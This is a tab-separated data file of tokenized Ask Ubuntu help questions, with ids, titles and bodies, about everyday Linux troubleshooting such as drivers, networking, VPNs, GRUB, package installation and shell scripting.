29042	image viewer : png vs gif	i have a bunch of files that have .png extension . however , some of them are actually gif files . any of the files , i can open them w/ gimp or view them in firefox , but when i try to open them with the eye of gnome viewer , it gives an error `` could not load image : fatal error reading png image file : not a png file '' is there : another image viewer that can open files with incorrect extensions that i could use as default ? it would need to have the ability to zoom in and out on images , and scroll through all the images in a folder via arrow keys . an automated way to rename the files that are actually gif files to the correct extensions ? choice 2 is preferred , but i do n't now how to tell what type they are . i would be able to put together a bash script to do the renaming if there is a command that could tell me what type they are .
29047	fglrx does not have /usr/lib/libgl.so lib	i am trying to compile some opengl apps from sources but there is no /usr/lib/libgl.so , or /usr/lib/libgl.so.1 or even /usr/lib/libgl.so.1.2 . however fglrxinfo says : display : :0.0 screen : 0 opengl vendor string : ati technologies inc. opengl renderer string : ati mobility radeon hd 4500 series opengl version string : 3.3.10237 compatibility profile context which is what i espect and the gears demo also works ... how do i get those files ? i tried the mesa files and then i got sw rendering which is not what i want ...
29051	how do i join a channel on freenode with empathy ?	i have empathy already installed but am not sure how to configure it to join the channel at http : //www.ape-project.org . i do not have a password or login name yet to properly configure the channel with empathy and when i click `` join our irc channel '' firefox comes back with an error stating : firefox does n't know how to open this address , because the protocol ( irc ) is n't associated with any program . what can i do to join this ( freenode ) channel ? update 1 using empathy version 2.23.1 when viewing accounts click `` add ... '' protocol : `` irc '' network : `` freenode '' create new nickname , password , and real name . then went back to ape-project.org link and click `` join our irc channel '' again . it brings my empathy contact list to the foreground but nothing happens ...
29056	display the first few lines of a file	i have a folder with quite a few files in it . i want to display the following : filename_1 first line of file1 second line of file1 third line of file1 filename_2 first line of file2 second line of file2 third line of file2 filename_3 first line of file3 second line of file3 third line of file3 etc . how can i do that ?
29057	ssh tunnel and receiving web pages through the tunnel	i 've tried to create a tunnel torward a client passed through a server , using the following command ssh -x -f admin @ ip_server -n -l 4444 : ip_client:80 but when try to open client:80 by firefox receive as error this channel 2 : open failed : unknown channel type : connection to 81.21.20.207 closed by remote host . someone knows where is the issue ? thanks so much
29062	does ubuntu one follow symlinks if synchronizing a folder ?	i 've looked for this question and have n't gotten a reasonable answer yet . if i synchronize a folder will it synchronize a symlink ? will it process all the way through the link to all the files within that symlink ?
29071	apt-get update can not find ubuntu servers	running sudo apt-get update fails on my server ( that has a 'net connection ) . are the servers temporarily broken , or is my apt misconfigured and using old servers ? in short , how do i fix this ? here 's the output : ~ $ uname -a linux nematode 2.6.28-19-server # 66-ubuntu smp sat oct 16 18:41:24 utc 2010 i686 gnu/linux ~ $ sudo apt-get update err http : //us.archive.ubuntu.com jaunty release.gpg could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com jaunty/main translation-en_us could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com jaunty/restricted translation-en_us could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com jaunty/universe translation-en_us could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com jaunty/multiverse translation-en_us could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com jaunty-updates release.gpg could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com jaunty-updates/main translation-en_us could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com jaunty-updates/restricted translation-en_us could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com jaunty-updates/universe translation-en_us could not resolve 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com jaunty-updates/multiverse translation-en_us could not resolve 'us.archive.ubuntu.com' err http : //security.ubuntu.com jaunty-security release.gpg could not resolve 'security.ubuntu.com' err http : //security.ubuntu.com jaunty-security/main translation-en_us could not resolve 'security.ubuntu.com' err http : //security.ubuntu.com jaunty-security/restricted translation-en_us could not resolve 'security.ubuntu.com' err http : //security.ubuntu.com jaunty-security/universe translation-en_us could not resolve 'security.ubuntu.com' err http : //security.ubuntu.com jaunty-security/multiverse translation-en_us could not resolve 'security.ubuntu.com' reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty/release.gpg could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty/main/i18n/translation-en_us.bz2 could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty/restricted/i18n/translation-en_us.bz2 could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty/universe/i18n/translation-en_us.bz2 could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty/multiverse/i18n/translation-en_us.bz2 could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty-updates/release.gpg could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty-updates/main/i18n/translation-en_us.bz2 could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty-updates/restricted/i18n/translation-en_us.bz2 could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty-updates/universe/i18n/translation-en_us.bz2 could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/jaunty-updates/multiverse/i18n/translation-en_us.bz2 could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/jaunty-security/release.gpg could not resolve 'security.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/jaunty-security/main/i18n/translation-en_us.bz2 could not resolve 'security.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/jaunty-security/restricted/i18n/translation-en_us.bz2 could not resolve 'security.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/jaunty-security/universe/i18n/translation-en_us.bz2 could not resolve 'security.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/jaunty-security/multiverse/i18n/translation-en_us.bz2 could not resolve 'security.ubuntu.com' w : some index files failed to download , they have been ignored , or old ones used instead . w : you may want to run apt-get update to correct these problems
29077	upgrade without internet & cd	i have an acer aspire one d255e netbook . both 10.04 and 10.10 hangs on install from usb , so could not install them . however ubuntu 9.10 worked and installed . then i figured i would just connect to the internet and update . however , the internet does not work ( does n't show up in notification ) , but it worked when 10.04 and 10.10 where used as a live usb . is there a way to update by using the 10.04-desktop iso file from a usb or somewhere in 9.10 , say the documents folder ?
29079	how do i provide a username and password to wget ?	i 've tried to connect to a server via wget : wget http : // < user > : < pass > @ serveradress but wget responds : invalid port i know that the server accepts incoming traffic at port 80 . how can i fix this issue ?
29081	why does nautilus use 90 % + cpu at startup ?	when i log into my account , nautilus uses about 90~95 % of cpu . what is it doing ?
29084	need help installing nvidia 6600gt drivers	i have downloaded the drivers from nvidia -- -- nvidia-linux-x86-260.19.36.run -- -- it 's for my nvidia 6600gt apg 8x -- i 'm using ubuntu10.10 . how do i get them installed , is there a way that my `` additional drivers '' program could download it somehow . i have been using linux for 10 days , so my knowledge is limited . the drivers that are in my `` additional drivers '' program do n't work . freezes and black screen .
29086	where are vpn configuration files imported by network manager saved ?	i 've imported an openvpn configuration file that behaves differently when trying to connect from network manager and command line . i would like to see what the imported configuration file looks like .
29092	apple iigs emulator ?	what is the best quality apple iigs emulator for ubuntu that is relatively easy to install ? i have tried kegs , but get the following ( working without probs on my windows partition ) : preparing x windows graphics system visual 0 id : 00000021 , screen : 0 , depth : 24 , class : 4 red : 00ff0000 , green : 0000ff00 , blue : 000000ff cmap size : 256 , bits_per_rgb : 8 chose visual : 0 , max_colors : -1 will use shared memory for x pipes : pipe_fd = 4 , 5 pipe2_fd : 6,7 open /dev/dsp failed , ret : -1 , errno:2 parent dying , could not get sample rate from child ret : 0 , fd : 6 errno:11
29098	how can i make the text cursor in x windows easier to see ?	the text cursor in x windows is too thin for me to see easily . it would be great if i could make the text cursor wider so that it was more visible . i know how to change the size of the mouse cursor in x by going to system > preferences > appearance and customizing the pointer so that it is larger . but i have not been able to find any setting that allows me to alter the appearance of the text cursor . so how can i make the text cursor easier to see ?
29099	geforce and radeon : what is present condition of opensource and proprietary drivers ?	so , it 'm about to buy a fresh videocard . since i do most of my stuff on linux , i wonder how well will either videocard perform . i recently had a good experience with geforce 6600 with proprietary drivers and a less than satisfactory experience with radeon 9000 a while ago . from my experience , proprietary drivers for geforce used to work very well , while proprietary drivers for radeon failed miserably . and opensource drivers were sloooow . a few months ago i found out that ati opened their specifications , and a work on fully featured opensource driver is in progress . i prefer to use free software whenever possible , with the exception of games , so , if that driver is fast enough , feature-rich enough and reliable enough i 'd very much like to try it out . i wish i could say that if i can just to basic things , like watch video , heavily use compiz and work with simple applications , this may be enough . i do most of my gaming under windows anyway . however , there is a good chance i 'll go into indie game development in a few months fulltime , so it should also be able to run not-so-very-demanding games ( say nexuiz ) . but if it is n't , i 'd like to know , what to expect from proprietary drivers . do recent proprietary drivers from nvidia and ati work well ? are ati drivers just as easy to install on ubuntu as are nvidia drivers ?
29102	accessing host lvm partition from windows xp through virt.manager 0.8.5 / qemu / kvm	requested use case is having a windows xp sp3 guest running in 64bit ubuntu . ( linux pcs 2.6.35-22-server # 35-ubuntu smp sat oct 16 22:02:33 utc 2010 x86_64 gnu/linux ) i want this guest to access an lvm lv on the ubuntu disk . i 've setup the following lvm config : -- - logical volume -- - lv name /dev/storage/sdc1 vg name storage lv uuid zg5imc-olqb-prl5-fgg4-3a9a-ogkp-oz0qkj lv write access read/write lv status available # open 0 lv size 1.01 gib current le 259 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 251:3 -- 1 ) i 've setup a storage pool for /dev/storage 2 ) i 've mkfs.vfat /dev/storage/sdc1 3 ) and made a virtual ide disk in the virt-manager setup for the guest . target device : ide disk 2 source path : /dev/storage/sdc1 -- now when running xp ( guest ) windows sees a new disk in disk manager and want 's to install a partition on it , since it believes the drive is empty . after formatting from within windows i can put data on the new disk volume . -- back in ubuntu however i can not access this this any more since it created a partition within an lvm logical volume . running fdisk -l shows the following : root @ pcs : /media # fdisk -l /dev/storage/sdc1 disk /dev/storage/sdc1 : 1086 mb , 1086324736 bytes 32 heads , 63 sectors/track , 1052 cylinders units = cylinders of 2016 * 512 = 1032192 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8d72e4f4 device boot start end blocks id system /dev/storage/sdc1p1 1 1050 1058368+ c w95 fat32 ( lba ) -- which seems fine to me , but when trying to mount /dev/storage/sdc1p1 i get the following error : mount /dev/storage/sdc1p1 /media/xp mount : special device /dev/storage/sdc1p1 does not exist which makes sense since in lvdisplay sdc1p1 does not exist main question : i want to mount the vfat partition in both ubuntu and xp what am i missing here ? ? ? ? ? regards , and thanks for your consideration .
29103	how to customize `` places '' menu	i want to add a public folder at here . -the public folder exists in ~/public as default . how can i do ?
29106	black & white video with youtube	i have an issue with the youtube player within ubuntu . it seems that when playing videos , they are in black and white , no matter whether they are normal resolution or hd . i kind of figured out how to prevent this from happening by deleting the cookie pref that holds a kv pair like this : pref f1=50000000 & fv=10.2.154 .youtube.com / sat , 12 mar 2011 11:38:29 gmt the issue is the flash version key . when i delete this , the color comes back , but obviously when i navigate to another page the cookie is set again . does anyone know why this issue occurs and what a possible fix is ? i 'm using the latest google chrome on the latest version of ubuntu ( installed 3 days ago ) . thanks .
29108	is there any utility like the windows program smartcopy ?	it should help me pause copying , so i dont have to wait for each copy to finish . basic googling didnt help out . the windows equivalent is teracopy , or fastcopy . i need the application to be gui based , but would n't mind shell commands . i wait for the copy to finish , in cases where i copy to the same destination , like a pen-drive , where throughput is in the order of 5 mb/s .
29111	when i create a new user , how do i automatically create a .virtualenvs directory in their home directory ?	i want to automatically create a directory called `` .virtualenvs '' in each new user 's home directory upon creation of that new user . i am using the useradd command to create new users .
29113	installer not showing complete list of partitions	i am a total beginner to ubuntu . i have tried to install ubuntu on my 320 gb hard disk and am stuck at the partition page . the problem is , ubuntu is not showing all the partitions . when i run the live cd and try to see all the drives these are not present . i have presently 4 drives , c : 58 gb d : 48 gb e : 87 gb and f : 102 gb . the f : drive is not shown ; at the time of installing it does not show any of the drives , just a chunk of 257 gb , hence i am unable to install ubuntu on my d : drive . on the c : drive , windows 7 64 bit is installed .
29115	do any networkmanager vpn plugins support ipv6 ?	do any of the networkmanager vpn plugins support ipv6 ? the two i 've tried so far ( pptp and strongswan ) only show an `` ipv4 '' tab . i would have thought at least the ipsec one would support ipv6 ?
29118	is there a way to install ubuntu stripped down without desktop applications ?	just to start off , i know of lubuntu but it really does n't meet what i am looking for . basically what i am looking for is the standard desktop ubuntu install , but with out all the word processing , multimedia , and games installed . i have seen posts out about how to get the desktop environment running on ubuntu server , but they seem complicated , and never seem to equal the standard desktop install . so my question is , is there anyway to tell the standard desktop install not to install all the applications ? or is there a distro available that leaves all the applications out , and just has the standard desktop look and feel ? what i really want this for is , is for development purposes to run on a vm to do mono development .
29121	guide to particulars in customizing ubuntu installer	i 've tried reading through guides for preseeding and customization , but i did not understand how and where to modify which options . i can only comfortably learn through practical examples , for which i ask this question . i am looking into preseeding and customizing solution to just do a few specific tasks : completely rewrite the packages installed by default , much like minimal installs and with the -- no-install-recommends flag of apt-get . add a few proprietary applications to the default install list automatically install and mount proprietary drivers on install and live session edit the default configuration files for applications installed by default specify partitions along with permission modify the package pool in the installer media ( cd/dvd/usb ) , preferably using command line tools similar to apt-get and aptitude . can anyone please tell me how to configure preseed option to only do the above ? nb i do not understand the gpg part after adding/removing packages in the pool . ps the third point is of particular importance .
29122	usb tethered connection via nexus one not showing on networkmanager	when plugging my nexus one ( android 2.3.3 ) via usb and activating the `` usb tethering '' option , i can not enable the connection via network manager , because i just see a gray `` disconnected '' option . if i connect manually ( dhclient usb0 , add nameserver to /etc/resolv.conf ) it works . how can i make it work with network manager ? i use ubuntu 10.10 .
29125	what 's the best way to install the gd graphics library for nagios ?	while trying to install nagios 3.2.3 , i ran their ./configure script and got these errors : checking for main in -liconv ... no checking for gdimagepng in -lgd ( order 1 ) ... no checking for gdimagepng in -lgd ( order 2 ) ... no checking for gdimagepng in -lgd ( order 3 ) ... no checking for gdimagepng in -lgd ( order 4 ) ... no *** gd , png , and/or jpeg libraries could not be located ... ********* boutell 's gd library is required to compile the statusmap , trends and histogram cgis . get it from http : //www.boutell.com/gd/ , compile it , and use the -- with-gd-lib and -- with-gd-inc arguments to specify the locations of the gd library and include files . note : in addition to the gd-devel library , you 'll also need to make sure you have the png-devel and jpeg-devel libraries installed on your system . note : after you install the necessary libraries on your system : 1 . make sure /etc/ld.so.conf has an entry for the directory in which the gd , png , and jpeg libraries are installed . 2 . run 'ldconfig ' to update the run-time linker options . 3 . run 'make clean ' in the nagios distribution to clean out any old references to your previous compile . 4 . rerun the configure script . note : if you ca n't get the configure script to recognize the gd libs on your system , get over it and move on to other things . the cgis that use the gd libs are just a small part of the entire nagios package . get everything else working first and then revisit the problem . make sure to check the nagios-users mailing list archives for possible solutions to gd library problems when you resume your troubleshooting . ******************************************************************** which package do i want ? libgd2-xpm-dev ? libgd2-noxpm-dev ? php5-gd ? i 'm not looking to do any image processing myself - i just want to get nagios working .
29128	which video card for a 1680x1050 resolution ?	i 've a 22 '' monitor , i 'm using ubuntu 10.10 . my video card is a radeon x1300 and i 've poor performance at that resolution . if i decrease resolution to 1280x1024 for example , i can use netbeans , monodevelop etc . without problem . so i 'm asking : which agp video card can i buy to have good performance with ubuntu at high resolution ? thanks
29132	gnome-terminal `` can not open location '' error	i am completely new to linux and ubuntu . but after taking a lot of time and pain..i installed ubuntu server edition onto my server , got the gui installed . now when i press alt+f2 , i get the `` run application '' window . but when ever i enter gnome-terminal it gives me this error message `` could not open location file : ///home/username/gnome-terminal '' i dont know why it is giving this . can anyone help me with this ? ? thanks in advance .
29138	evolution not showing latest email in my imap inbox	i 've got an imap mail server running dovecot . i use several different mail clients -- k-9 mail on my nexus one , and roundcube webmail when i 'm not on my main computer . on my main computer , i use evolution . however , it does n't show the latest emails on the server . i can see them with other clients ; just not evolution . is there a way to force evolution to re-load the entire folder ?
29139	how can i connect to a specific ntp server ?	i have an ntp server i want to connect to . i know its ip address . how can i connect to it through the command line ?
29141	intermittent ethernet connectivity	i am facing a weird problem . i am connecting to my dsl modem via ethernet . after booting , sometimes ubuntu 10.10 does not detect the eth0 card properly or does not connect to the modem . i have made the following observations : my modem is fully on . all indicators are on except ethernet , which is blinking continuously . my network indicator applet informs me that i am connected to modem , but i am not able to browse as it has not established connection with modem . i need to power off and on ( restart ) the modem several times or disconnect/connect ( via network applet ) several times , before the system can establish a connection with the modem . once it establishes the connection , the ethernet led ( on modem ) stops blinking and glows continuously . however , i do not see this problem every time i reboot or start my computer . 3/5 time , it connects to the modem in a single attempt . friends , i am not able to understand root cause of this problem . plus i do not know what kind of logs should be attached . if you want any logs please give me command to run , and i will paste the result for you . note : i ran system testing when above problem happened . follow this link to download result .
29142	how to associate unity dash 's buttons to the preferred applications ?	unity dash shows some big buttons by hitting the ubuntu logo : internet , mail , games , music . i 'm currently using different programs than the original ones included in ubuntu , but these buttons have become useless , not opening any application . is there any way to fix this ?
29145	grub 's menu.lst deleted after a kernel update	i have installed ubuntu through wubi and all was well until i updated to the next kernel version . i am now trying to boot into ubuntu and it shows me the grub rescue command line . i am able to boost windows and the problem seems to be related to the fact that i have no menu.lst on ubuntu\disks\boot\grub and also it might be related to the fact that wubi was n't installed to the drive where windows is installed but i am not sure . how do i recover menu.lst ? does the problem lay somewhere else ? is there a way to read the data with a windows tool to just recover my data ?
29148	is ubuntu switching to nouveau ?	driver application in natty offers a free nvdia driver , and it works with compiz and unity . will natty be able to use nouveau and gallium ,
29149	can oo presentation go full-screen to the secondary monitor ?	i have two screens set up on my desktop , the second is a projector . for obvious reasons i would like to have the secondary screen ( projector ) display the full-screen view of oo presentation . i am using an nvidia graphics card and the nvidia x server settings .
29152	how do i use python with apache2 ?	i 'm trying to get python working with apache , however i 'm failing to have success with either cgi or mod_python . does anyone know a good tutorial or something ? thanks .
29154	upgrading from a previous version of ubuntu	can we upgrade a previous version of ubuntu to the latest version without losing data ? ( for example , will i be able to upgrade the 10.10 version to 11.04 , which is due to be released in april of 2011 ? ) i mean , there is a new version coming out every 6 months , so it will be convenient if we are able to upgrade without losing on the data .
29155	quota exceeded but i only use 1.8 mb	everytime i start up , i get an error message from ubuntu one that says i 've exceeded my quota , but i 'm only using 1.8 mb and i thought you got 2 gb . how do i fix this ?
29156	what does `` [ in-use ] account is locked by another session or for maintenance , try again . '' mean ?	i 'm in the process of migrating a computer from windows to ubuntu . i followed these instructions to move my thunderbird emails over . the emails that i moved show up , but when i try to check for new emails i get this message : sending of password did not succeed . mail server pop.windstream.net responded : [ in-use ] account is locked by another session or for maintenance , try again . i click ok and another box pops up saying : login to server pop.windstream.net failed . with 3 options : '' enter new password '' ( i 'm sure the one i 'm typing is correct ) '' cancel '' '' retry '' i 've tried all 3 . retyping my password , clicking `` retry '' , same result . while i was typing this , i got a toast that said : thunderbird 's attempt to connect to pop.windstream.net has timed out . what is causing this and how can i fix it ?
29160	how to get ubuntu guest vm to recognize second virtualbox monitor ?	now that virtualbox supports multiple monitors for guests , i decided to try it out with ubuntu 11.04 alpha3 ( i386 ) as a guest . unfortunately , the second screen stays black and i ca n't even get xrandr to see the other display . is there some way of getting this feature to work ?
29163	which mailx package should i install for nagios ?	i 'm following the nagios ubuntu quickstart instructions . i 'm on ubuntu 10.10 and installing nagios 3.2.3 . at the bottom of the docs it says i need to install the mailx and postfix packages . ( postfix is already installed . ) but when i try to install mailx , i get asked which of 3 packages to install : $ sudo apt-get install mailx [ sudo ] password for nagios : reading package lists ... done building dependency tree reading state information ... done package mailx is a virtual package provided by : mailutils 1:2.1+dfsg1-4ubuntu1 heirloom-mailx 12.4-1.1 bsd-mailx 8.1.2-0.20090911cvs-2ubuntu1 you should explicitly select one to install . e : package mailx has no installation candidate which one should i install ?
29166	is there transparency of windows in gnome ?	sometimes ago i had used kde 3.5 i think , and really liked the transparency option for windows , which gave all my text editor a really killer look and feel , really nice/ethereal environment for coding . i have n't managed to find such a possibility with gnome . any idea if it is possible and how ?
29169	installing on a computer with usb 3.0 hardware	i 'm installing ubuntu 10.10 32-bit version on an hp envy 15 . i get the same problem these people have here : '' unable to find a medium containing a live file system '' error when installing but the question was never resolved . i spent so long researching and got so frustrated that i took my computer down to a shop and asked them to install it for me . it took them a while but they managed to get it installed . the reason for this error they had said was because ubuntu did n't have the usb 3.0 drivers it needed to install properly . i 'm reinstalling ubuntu yet again and i 've run into the same issue so my question is : does anyone know.. a ) where to get these usb 3.0 drivers ? b ) how to get them installed when installing the ubuntu os ? thanks , matt
29173	problem installing qtbase	i am getting the following error when installing `` qtbase '' package for r : [ 68 % ] building cxx object smoke/qt/cmakefiles/smokeqt.dir/x_1.cpp.o /home/mroot/qtbase/kdebindings-build/smoke/qt/x_1.cpp : in static member function ‘static void __smokeqt : :x_qabstractprintdialog : :x_8 ( smoke : :stackitem* ) ’ : /home/mroot/qtbase/kdebindings-build/smoke/qt/x_1.cpp:4893 : error : can not allocate an object of abstract type ‘__smokeqt : :x_qabstractprintdialog’ /home/mroot/qtbase/kdebindings-build/smoke/qt/x_1.cpp:4834 : note : because the following virtual functions are pure within ‘__smokeqt : :x_qabstractprintdialog’ : /usr/include/qt4/qtgui/qabstractprintdialog.h:89 : note : virtual int qabstractprintdialog : :exec ( ) /home/mroot/qtbase/kdebindings-build/smoke/qt/x_1.cpp : in constructor ‘__smokeqt : :x_qabstractprintdialog : :x_qabstractprintdialog ( ) ’ : /home/mroot/qtbase/kdebindings-build/smoke/qt/x_1.cpp:4896 : error : no matching function for call to ‘qabstractprintdialog : :qabstractprintdialog ( ) ’ /usr/include/qt4/qtgui/qabstractprintdialog.h:116 : note : candidates are : qabstractprintdialog : :qabstractprintdialog ( const qabstractprintdialog & ) /usr/include/qt4/qtgui/qabstractprintdialog.h:113 : note : qabstractprintdialog : :qabstractprintdialog ( qabstractprintdialogprivate & , qprinter* , qwidget* ) /usr/include/qt4/qtgui/qabstractprintdialog.h:86 : note : qabstractprintdialog : :qabstractprintdialog ( qprinter* , qwidget* ) make [ 3 ] : *** [ smoke/qt/cmakefiles/smokeqt.dir/x_1.cpp.o ] error 1 make [ 3 ] : leaving directory `/home/mroot/qtbase/kdebindings-build' make [ 2 ] : *** [ smoke/qt/cmakefiles/smokeqt.dir/all ] error 2 make [ 2 ] : leaving directory `/home/mroot/qtbase/kdebindings-build' make [ 1 ] : *** [ all ] error 2 make [ 1 ] : leaving directory `/home/mroot/qtbase/kdebindings-build' make : *** [ all ] error 2 error : compilation failed for package ‘qtbase’ * removing ‘/home/mroot/r/i686-pc-linux-gnu-library/2.12/qtbase’ any ideas ?
29175	automation extracting many passworded archive	i have many 7zip archive with same password . when i extract it , both using gui application and command line , i must enter same password again and again . when i read the 7za command manual pages , i just found how to specify the password to add an archive , not to extract it . 7za command need us to manually type the password . is there any way to do it automatically ?
29179	windows partition not booting	using clonezilla , i cloned a windows 7 installation from the first partition on one drive to the first partition on a second larger drive and then installed ubuntu into the second partition ( same configuration as the original drive , just newer version instead of old ) . ubuntu detected the windows 7 partition properly and added it to the grub menu . however , when i choose the win7 option in grub , i just get a black screen and blinking cursor . how can i fix this ? @ centaurusa : here is the output of boot info script output http : //pastebin.com/778rp7lp
29181	gaining access to a folder which requires you to be the admin/owner ?	hey there , i 'm trying to install a gedit plugin called zoom , and in order for it to be picked up by gedit it needs to be extracted in this folder /usr/lib/gedit-2/plugins . my problem is i ca n't copy paste the files into that directory . i tried changing the permissions on that folder but it says `` you are not the owner , so you can not change these permissons '' . how do i fix this ?
29183	no internet access when vpn connected	i have an openvpn config that i use on my windows xp box and on my ubuntu machine . when i use it with my windows machine , i can connect to the vpn and access sites on the vpn , and the internet as normal . when i use it on my ubuntu box , when connected to the vpn , i can only access internal sites - no internet access at all . i 'm sure there is a way to configure openvpn on ubuntu to allow internet connections , but i ca n't figure out how .
29185	how do i setup audacity and pulseaudio to record from a line in ?	this is pretty confusing to me , even after reading through audacity and pulseaudio 's wiki and docs . i know this may be a pretty detailed and long explanation , so thank you in advance for any advice you can give .
29187	does quickly have an ide of some sort ?	i know quickly is supposed to make life easier for developers of all kinds , i 'm just curious as to if there is an ide for quickly ( something like qtcreator or monodevelop ) ? if not , as a part b , is there one on the way ?
29188	evolution - exchange-connector , rackspace global catalog server	i 'm ( trying to ) switch to ubuntu from windows xp on my work laptop . unfortunately , one of the dealbreakers is that i need full exchange contact/calendar syncing . our email is hosted by rackspace ( owa.mailseat.com ) . we login using the usernames of the format first.lastname @ ourcompany.com . i 'm trying to set up evolution to use this account , using exchange-connector-setup-2.32 . the first step , entering the owa url , usename and password works , and progresses to step 2 , where i need to enter a global catalog server . i have no idea what to enter here . everything fails . my questions are - what is the `` global catalog server '' - can i enter/run some dummy server here ? - if its necessary , where can i get the information from this ? i have a windows xp machine synced up using outlook 2007 , so if i need to gather any information from that setup i can .
29190	in gnu grub , i receive error : no loaded kernel . how do i load a kernel ?	whenever i type in 'boot ' i get the error message , `` no loaded kernel '' . how do i boot normally again ? grub version 1.98 dual-booting ubuntu and windows
29195	how to get rhythmbox running on another user account to see the audio cd i inserted ?	i have inserted an audio cd . i have also logged into another account on the same machine through ssh -x. i can successfully launch rhythmbox , but it does n't see the cd i have inserted , even though it is visible in my main account . how can i convince rhythmbox that a cd has been inserted ? i already tried 'scan for removable media ' , but that did n't work . update : vlc can see and access /dev/cdrom but rhythmbox can not .
29197	different partial zooms using keyboard	when coal was young i was using fvwm ( or maybe tvwm ? ) which allowed me to define many different zooms and control them using keyboard , something like super+left : make the window fill the left half of the screen super+top : the same for the top half super+pgdown : zoom horizontally and so on . pressing the key again restored the original size . how can i do it with ubuntu ?
29199	how do i add a background in aisleriot solitaire ?	i 've seen screenshots with different backgrounds on the aisleriot card game . how do i set one in ubuntu ? here is a picture of the background i made in gimp which i want to use in aisleriot ; please do n't take credit for my image if you want to use it , i am planning on implementing this into the default theme of aisleriot on 11.04 .
29200	how to get elantech trackpad to be identified properly , curently has no extended functionality	i have a samsung rf510 laptop computer . upon installing ubuntu 10.10 onto it i could not get the trackpad to function properly . it works as a basic mouse ( point and click ) but had no functionality for edge scrolling or any of the multitouch settings the trackpad is capable of . i discovered the reason is a known issue where the ubuntu kernel will improperly detect an elantech trackpad as a logitech ps/2 wheel mouse , and as such will gain none of the functionality that seems to be coded for synaptics trackpads . is there any way to get this working properly ? i would like basic scrolling/zooming/etc i 've been used to using these features for as long as i can remember .
29201	certain applications do n't stay in launcher	i can start up intellij idea using the commandline , which is a shell script that starts up a java process . it then appears in the launcher , as normal . i can select `` keep in launcher '' , but it only remains there until i reboot , then it disapears again . this is the only application i 've seen that does this - stuff already in the applications menu stocks around fine if i tell it to stay in the launcher .
29203	netbook alternate installation/update	i have an asipre one d255e netbook . installed 9.10 sucessfully , but no internet connections to upgrade to 10.04 or 10.10 . have 10.10 alternate ( couldnt get 10.04 ) . however it says that no cd-rom present ( netbook via live usb ) , and i directed it to sdb1 but that did not work . could someone guide me to the steps to installation via alternate usb only ( & no internet ) ? the live usb 's of 10.04 & 10.10 internet connections worked , but installation hanged ( non alternate ) . thank you greatly in advance .
29209	disable resize gripper in windows ?	is it possible to disable the the new resize gripper that shows up in ubuntu natty/11.04 ?
29211	check graphics card activity	i have an application installed which can make use of my cuda graphics card , but i 'm not sure if i have it configured correctly . is there a way to check the graphics card activity ( throughput , power draw , anything which will tell me if it is being utilised ) ?
29212	does somebody know if the light themes will get overhauled for natty ?	i 'm just curious to know if the light themes will get overhauled for natty since they jumped from being okay in lucid to being awesome in maverick .
29215	how can i read user input as an array in bash ?	how could i read user input as an array ? : )
29218	left and right keys acting crazy ?	i just installed ubuntu 10.10 netbook remix on my hp mini 1000 . everything worked fine right up until i tried typing - apparently the left and right arrow keys on my keyboard are uncontrollable . everything i type ends up looking messed up because the left and right keys keep automatically inserting themselves into everything i type . this also happens when i click on , say , `` file '' on firefox . it starts rotating between all the different menu options even though i 'm not pressing anything on the keyboard . does anyone have any idea what 's going on ? is this a problem with the keyboard itself ?
29219	script to download music and transfer to ipod ?	i need help making a script that would do this this is what i would do manually in terminal ( i will be using the .getmusic script from 360 percents to download myspace music ) : cd /home/eric/music to make sure music gets downloaded to /home/eric/music : /home/eric/getmusic.sh http : //www.myspace.com/artist i would like to be able to enter the clipboard text automatically ( i do n't know how to ) in place of `` artist '' music is downloaded to /home/eric/music in .mp3 format scp -r /home/eric/music/* root @ 192.168.0.183 : /var/mobile/media/music copies music to ipod via ssh
29222	run openvpn service on connection to internet	how can i make a openvpn run automatically whenever my system is connected to the internet ?
29229	how do i reload the clock applet ?	it seems i am running this bug . sometimes my clock applet just stops running , and i have a pop-up window saying 'the clock has quit unexpectedly ' . between 'reload ' and 'close ' , i have unfortunately chosen the second option . even if i have rebooted , i can not launch the applet anymore . i am on ubuntu 10.10 . can somebody give me the command line that i could use in the application launcher appearing when alt + f2 are hit ? or any other solution in order to recover the applet on the gnome-panel ?
29230	is there software that can fill pdf forms ?	i have some pdfs which are actually forms , with fields to fill . is there some software that can fill those fields ?
